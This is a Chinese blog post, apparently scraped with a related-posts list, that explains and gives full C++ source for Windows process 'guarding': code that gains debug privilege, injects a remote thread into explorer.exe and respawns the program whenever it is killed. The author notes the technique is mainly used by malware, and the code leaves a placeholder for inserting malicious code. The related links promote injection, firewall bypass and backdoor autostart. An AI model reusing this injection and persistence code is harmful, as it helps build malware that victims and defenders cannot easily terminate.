2. 程式人生 > >安全之路 —— C++實現進程守護

安全之路 —— C++實現進程守護

阿新 發佈:2018-09-08
之前 aps serve query value isa process read subst

簡介



所謂進程守護,就是A進程為了保護自己不被結束,創建了一個守護線程來保護自己,一旦被結束進程,便重新啟動。進程守護的方法多被應用於惡意軟件,是一個保護自己進程的一個簡單方式,在ring3下即可輕松實現。而創建守護線程的方法多采用遠程線程註入的方式,筆者之前曾介紹過遠程線程註入的基本方式,主要分為DLL遠程註入和無DLL遠程註入。

代碼實現


//////////////////////////////////////////////////////////////////
//
// FileName : ProcessProtectorDemo.cpp
// Creator : PeterZheng
// Date : 2018/9/06 17:32
// Comment : Process Protector
//
//////////////////////////////////////////////////////////////////

#pragma once

#include <cstdio>
#include <iostream>
#include <cstdlib>
#include <string.h>
#include <string>
#include <strsafe.h>
#include <Windows.h>
#include <tlhelp32.h>
#include <vector>

using namespace std;

#define MAX_LENGTH 255
#pragma warning(disable:4996)

//遠程線程參數結構體
typedef struct _remoteTdParams
{
    LPVOID ZWinExec;             // WinExec Function Address
    LPVOID ZOpenProcess;         // OpenProcess Function Address
    LPVOID ZWaitForSingleObject; // WaitForSingleObject Function Address
    DWORD ZPid;                  // Param => Process id
    HANDLE ZProcessHandle;       // Param => Handle
    CHAR filePath[MAX_LENGTH];   // Param => File Path
}RemoteParam;

//本地線程參數結構體
typedef struct _localTdParams
{
    CHAR remoteProcName[MAX_LENGTH];
    DWORD localPid;
    DWORD remotePid;
    HANDLE hRemoteThread;
}LocalParam;

//字符串分割函數
BOOL SplitString(const string& s, vector<string>& v, const string& c)
{
    string::size_type pos1, pos2;
    pos2 = s.find(c);
    pos1 = 0;
    while (string::npos != pos2)
    {
        v.push_back(s.substr(pos1, pos2 - pos1));

        pos1 = pos2 + c.size();
        pos2 = s.find(c, pos1);
    }
    if (pos1 != s.length())
        v.push_back(s.substr(pos1));
    return TRUE;
}


//遠程線程函數體 (守護函數)
DWORD WINAPI ThreadProc(RemoteParam *lprp)
{
    typedef UINT(WINAPI *ZWinExec)(LPCSTR lpCmdLine, UINT uCmdShow);
    typedef HANDLE(WINAPI *ZOpenProcess)(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
    typedef DWORD(WINAPI *ZWaitForSingleObject)(HANDLE hHandle, DWORD dwMilliseconds);
    ZWinExec ZWE;
    ZOpenProcess ZOP;
    ZWaitForSingleObject ZWFSO;
    ZWE = (ZWinExec)lprp->ZWinExec;
    ZOP = (ZOpenProcess)lprp->ZOpenProcess;
    ZWFSO = (ZWaitForSingleObject)lprp->ZWaitForSingleObject;
    lprp->ZProcessHandle = ZOP(PROCESS_ALL_ACCESS, FALSE, lprp->ZPid);
    ZWFSO(lprp->ZProcessHandle, INFINITE);
    ZWE(lprp->filePath, SW_SHOW);
    return 0;
}

//獲取PID
DWORD __cdecl GetProcessID(CHAR *ProcessName)
{
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);
    HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE) return 0;
    BOOL bProcess = Process32First(hProcessSnap, &pe32);
    while (bProcess)
    {
        if (strcmp(strupr(pe32.szExeFile), strupr(ProcessName)) == 0)
            return pe32.th32ProcessID;
        bProcess = Process32Next(hProcessSnap, &pe32);
    }
    CloseHandle(hProcessSnap);
    return 0;
}

//獲取權限
int __cdecl EnableDebugPriv(const TCHAR *name)
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;
    LUID luid;
    if (!OpenProcessToken(GetCurrentProcess(),
        TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
        &hToken)) return 1;
    if (!LookupPrivilegeValue(NULL, name, &luid)) return 1;
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    tp.Privileges[0].Luid = luid;
    if (!AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) return 1;
    return 0;
}

//線程註入函數
BOOL __cdecl InjectProcess(const DWORD dwRemotePid, const DWORD dwLocalPid, HANDLE& hThread)
{
    if (EnableDebugPriv(SE_DEBUG_NAME)) return FALSE;
    HANDLE hWnd = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwRemotePid);
    if (!hWnd) return FALSE;
    RemoteParam rp;
    ZeroMemory(&rp, sizeof(RemoteParam));
    rp.ZOpenProcess = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "OpenProcess");
    rp.ZWinExec = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "WinExec");
    rp.ZWaitForSingleObject = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "WaitForSingleObject");
    rp.ZPid = dwLocalPid;
    CHAR szPath[MAX_LENGTH] = "\0";
    GetModuleFileName(NULL, szPath, sizeof(szPath));
    StringCchCopy(rp.filePath, sizeof(rp.filePath), szPath);
    RemoteParam *pRemoteParam = (RemoteParam *)VirtualAllocEx(hWnd, 0, sizeof(RemoteParam), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!pRemoteParam) return FALSE;
    if (!WriteProcessMemory(hWnd, pRemoteParam, &rp, sizeof(RemoteParam), 0)) return FALSE;
    LPVOID pRemoteThread = VirtualAllocEx(hWnd, 0, 1024 * 4, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!pRemoteThread) return FALSE;
    if (!WriteProcessMemory(hWnd, pRemoteThread, &ThreadProc, 1024 * 4, 0)) return FALSE;
    hThread = CreateRemoteThread(hWnd, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteThread, (LPVOID)pRemoteParam, 0, NULL);
    if (!hThread) return FALSE;
    return TRUE;
}

//遠程線程監控函數(本地線程函數)
DWORD WINAPI WatchFuncData(LPVOID lprarm)
{
    HANDLE hRemoteThread = ((LocalParam*)lprarm)->hRemoteThread;
    DWORD dwLocalPid = ((LocalParam*)lprarm)->localPid;
    DWORD dwRemotePid = ((LocalParam*)lprarm)->remotePid;
    CHAR szRemoteProcName[MAX_LENGTH] = "\0";
    StringCchCopy(szRemoteProcName, sizeof(szRemoteProcName), ((LocalParam*)lprarm)->remoteProcName);
    DWORD exitCode = 0;
    while (TRUE)
    {
        if (!hRemoteThread) InjectProcess(dwRemotePid, dwLocalPid, hRemoteThread);
        GetExitCodeThread(hRemoteThread, &exitCode);
        if (exitCode^STILL_ACTIVE)
        {
            WinExec(szRemoteProcName, SW_HIDE);
            dwRemotePid = GetProcessID(szRemoteProcName);
            InjectProcess(dwRemotePid, dwLocalPid, hRemoteThread);
        }
        Sleep(1000);
    }
    return 0;
}

//主函數
int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)
{
    LocalParam lpLp;
    ZeroMemory(&lpLp, sizeof(LocalParam));
    CHAR szRemoteProcName[MAX_LENGTH] = "\0";
    CHAR szLocalProcName[MAX_LENGTH] = "\0";
    CHAR currentFilePath[MAX_LENGTH] = "\0";
    vector<string> pathGroup;
    GetModuleFileName(NULL, currentFilePath, sizeof(currentFilePath));
    SplitString(currentFilePath, pathGroup, "\\");
    StringCchCopy(szLocalProcName, sizeof(szLocalProcName), pathGroup[pathGroup.size() - 1].c_str());
    StringCchCopy(szRemoteProcName, sizeof(szRemoteProcName), "explorer.exe");
    StringCchCopy(szLocalProcName, sizeof(szLocalProcName), szLocalProcName);
    StringCchCopy(lpLp.remoteProcName, sizeof(lpLp.remoteProcName), szRemoteProcName);
    DWORD dwRemotePid = GetProcessID(szRemoteProcName);
    DWORD dwLocalPid = GetProcessID(szLocalProcName);
    HANDLE hThread = NULL;
    lpLp.remotePid = dwRemotePid;
    lpLp.localPid = dwLocalPid;
    hThread = CreateThread(NULL, 0, WatchFuncData, LPVOID(&lpLp), 0, 0);
    //....插入惡意代碼等工作流程
    while (TRUE)
    {
        MessageBox(NULL, "Hello!!", "HAHA!! XDD", MB_OK);
    }
    WaitForSingleObject(hThread, INFINITE);
    return 0;
}

安全之路 —— C++實現進程守護

相關推薦

安全 —— C++實現守護

之前 aps serve query value isa process read subst 簡介 所謂進程守護,就是A進程為了保護自己不被結束,創建了一個守護線程來保護自己,一旦被結束進程,便重新啟動。進程守護的方法多被應用於惡意軟件,是一個保護自己進程的一個簡單方式

安全 —— C++實現程序守護

簡介 所謂程序守護,就是A程序為了保護自己不被結束,建立了一個守護執行緒來保護自己,一旦被結束程序,便重新啟動。程序守護的方法多被應用於惡意軟體,是一個保護自己程序的一個簡單方式,在ring3下即可輕鬆實現。而建立守護執行緒的方法多采用遠端執行緒注入的方式,筆

安全 —— C/C++實現後門的服務自啟動

net tom html 註冊表自啟動 bin hide any patch format 簡介 Windows NT系統後門要實現自啟動,有許多種方法,例如註冊表自啟動,映像劫持技術,SVCHost自啟動以及本章節介紹的服務自啟動等方法,其中服務自啟動相對於上述其他三種

安全 —— 利用遠註入的方法(使用DLL)實現穿墻與隱藏

pat 完整路徑 ystemd return cpi printf output inf server 簡介 大多數後門或病毒要想初步實現隱藏進程,即不被像任務管理器這樣典型的RING3級進程管理器找到過於明顯的不明進程,其中比較著名的方法就是通過遠程線程註

安全 —— 利用APC隊列實現註入

single obj 介紹 自己 for call 經典的 rap wait 簡介 在之前的文章中筆者曾經為大家介紹過使用CreateRemoteThread函數來實現遠程線程註入,毫無疑問最經典的註入方式,但也因為如此,這種方式到今天已經幾乎被所有安全軟件所防禦。所以今

安全 —— 無DLL文件實現註入

資源管理 dir 簡介 sdn wsize date process 地址 str 簡介 在之前的章節中,筆者曾介紹過有關於遠程線程註入的知識,將後門.dll文件註入explorer.exe中實現繞過防火墻反彈後門。但一個.exe文件總要在註入時捎上一個.d

樹莓派 (024) - windows遠桌面連接樹莓派通過xrdp服務(轉)

class win cse 端口 vncserver 通過 1-1 截圖 images 本文轉載:http://www.cnblogs.com/edgexie/p/6527992.html 在網上看到很多關於windows遠程桌面連接樹莓派的教程。我也按照教程試過了,遇到了

12、python全棧-並發編

arc 數據傳遞 狀態 for 是否 直接 沒有 交女朋友 pan 十二、並發編程之多進程 http://www.cnblogs.com/linhaifeng/articles/6817679.html 理論:http://www.cnblogs.com/linhaifen

安全 —— 利用SVCHost.exe系統服務實現後門自啟動

cas default wait cal tis lis success 放置 簡介 簡介 在Windows系統中有一個系統服務控制器,叫做SVCHost.exe,它可以用來管理系統的多組服務。它與普通的服務控制不同的是它采用dll導出的ServiceMain主函數實現服

毛毛Python2——實現雙端互聯

毛毛Python進階之路2——實現雙端互聯 1、兩個月前我開始自學Python 2、一個月前我在室友的壓迫下,我用Python優秀的第三方庫requests庫完成了相對正規的爬蟲專案。可以做到批量爬去網路上美眉的圖片【手動滑稽!!!】 連結:https://blog.csdn.ne

安全 —— 無DLL檔案實現遠端程序注入

簡介         在之前的章節中,筆者曾介紹過有關於遠端執行緒注入的知識,將後門.dll檔案注入explorer.exe中實現繞過防火牆反彈後門。但一個.exe檔案總要在注入時捎上一個.dll檔案著實是怪麻煩的,那麼有沒有什麼方法能夠不適用.dll檔案實現

程式設計師(CC++、Java、Python經典書籍及學習順序)

程式設計師進階之路 初級: 《計算機程式的構造和解釋》 C語言: 1.《C語言程式設計:現代方法:第2版》 2.《C Primer Plus 第五版》 3.《C程式設計語言(第2版·新版)》 4.《C和指標》 5.《C專家程式設計》 6.《C 陷阱與缺陷》 7.《資料結構C

安全 —— 藉助DLL進行遠端執行緒注入實現穿牆與隱藏程序

簡介        大多數後門或病毒要想初步實現隱藏程序,即不被像工作管理員這樣典型的RING3級程序管理器找到過於明顯的不明程序,其中比較著名的方法就是通過遠端執行緒注入的方法注入將惡意程序的DLL檔案注入系統認可的正常程序,你會發現工作管理員以及找不

C++標準庫棧(Stack)實現位制轉換

#include <iostream> #include <stack> using namespace std; int main() { int b,n,e; cout

C#殺掉的方法

c# processes code .get string mar pre col for C#殺掉進程的方法 1 private static string CmdName = "cmd"; 2 /// <summary> 3 /// 關閉進程

Android 使用AIDL實現間的通信

logs script recycle sin scrip void 轉換成 自己 end 在Android中,如果我們需要在不同進程間實現通信,就需要用到AIDL技術去完成。 AIDL(android Interface Definition Language)是一種接

C#多並行

等待 program thread ack event art windows click png 為了並行執行多個任務,可以啟動多個進程(並行數)。 下面提供兩種方法,總任務數10,最大並行數4。 一、方法1 using System; using System.Col

Android開發學習--圖表實現(achartengine/MPAndroidChart)初體驗

bundle 喜歡 嵌入式linux Y軸 tid ren sca ref java代碼 ??已經有一段時間沒有更新博客了,在上周離開工作了4年的公司,從此不再安安穩穩地工作了。很多其它的是接受挑戰和實現自身價值的提高。離開了嵌入式linux,從此擁抱移

[前端小小白的學習]--Bable實現由ES6轉譯為ES5

all str .json blog ict true save back sta Babel是一個廣泛使用的轉碼器,可以將ES6代碼轉譯為ES5代碼,從而在現有環境下執行。 舉例說明: 轉譯前(ES6格式)代碼如下: let User = { name : ‘

測試開發linux面試三:後臺操作

狀態 很好 分配 例如 名稱 標識 批處理 推薦 子進程 Hi,大家好我是Tom,繼上次分享之後這次給大家帶來新的知識。 進程是Linux系統中一個非常重要的概念。Linux是一個多任務的操作系統,系統上經常同時運行著多個進程。我們不關心這些進程究竟是如何分配的,或者是內核